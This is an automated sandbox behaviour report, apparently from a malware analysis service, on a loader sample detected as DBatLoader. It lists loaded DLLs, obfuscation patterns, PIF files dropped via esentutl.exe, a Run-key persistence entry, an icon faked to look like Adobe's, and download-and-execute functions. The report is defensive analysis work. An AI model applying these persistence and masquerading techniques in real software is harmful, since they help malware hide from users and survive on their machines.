Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ntasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr
Source:	Binary string: easinvoker.pdbH source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.000000000249D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002180D000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020700000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000206D0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2031234000.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2130066315.000000002183E000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2123647740.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2129503162.0000000005620000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.5.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE

Binary contains a suspicious time stamp

Source: alpha.pif.4.dr

Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029D894C LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_029D894C

PE file contains sections with non-standard names

Source: alpha.pif.4.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C63B0 push 029C640Bh; ret	0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C63AE push 029C640Bh; ret	0_2_029C6403
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CC349 push 8B029CC1h; ret	0_2_029CC34E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029EC378 push 029EC56Eh; ret	0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C6784 push 029C67C6h; ret	0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C6782 push 029C67C6h; ret	0_2_029C67BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9E716 push ecx; ret	0_2_02A9E729
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A7C446 push ecx; ret	0_2_02A7C459
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029EC570 push 029EC56Eh; ret	0_2_029EC566
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CC56C push ecx; mov dword ptr [esp], edx	0_2_029CC571
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D8AD8 push 029D8B10h; ret	0_2_029D8B08
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DAAE0 push 029DAB18h; ret	0_2_029DAB10
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CCA37 push 029CCD72h; ret	0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A34A50 push eax; ret	0_2_02A34B20
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CCBEC push 029CCD72h; ret	0_2_029CCD6A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D886C push 029D88AEh; ret	0_2_029D88A6
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D6948 push 029D69F3h; ret	0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D6946 push 029D69F3h; ret	0_2_029D69EB
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D2F60 push 029D2FD6h; ret	0_2_029D2FCE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED2FC push 029ED367h; ret	0_2_029ED35F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029C332C push eax; ret	0_2_029C3368
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED0AC push 029ED125h; ret	0_2_029ED11D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_02A9F038 push eax; ret	0_2_02A9F056
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D306C push 029D30B9h; ret	0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D306B push 029D30B9h; ret	0_2_029D30B1
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED1F8 push 029ED288h; ret	0_2_029ED280
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029DF108 push ecx; mov dword ptr [esp], edx	0_2_029DF10D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029ED144 push 029ED1ECh; ret	0_2_029ED1E4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029CD5A0 push 029CD5CCh; ret	0_2_029CD5C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D790C push 029D7989h; ret	0_2_029D7981
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Code function: 0_2_029D5E7C push ecx; mov dword ptr [esp], edx	0_2_029D5E7E

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Vjrsafyh.PIF	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027C6EEB ShellExecuteW,URLDownloadToFileW,

8_2_027C6EEB

Drops PE files

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Vjrsafyh.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 8_2_027DAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_027DAADB

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vjrsafyh			Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vjrsafyh			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: adobe 12.png

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe

Code function: 0_2_029DAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_029DAB1C

Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
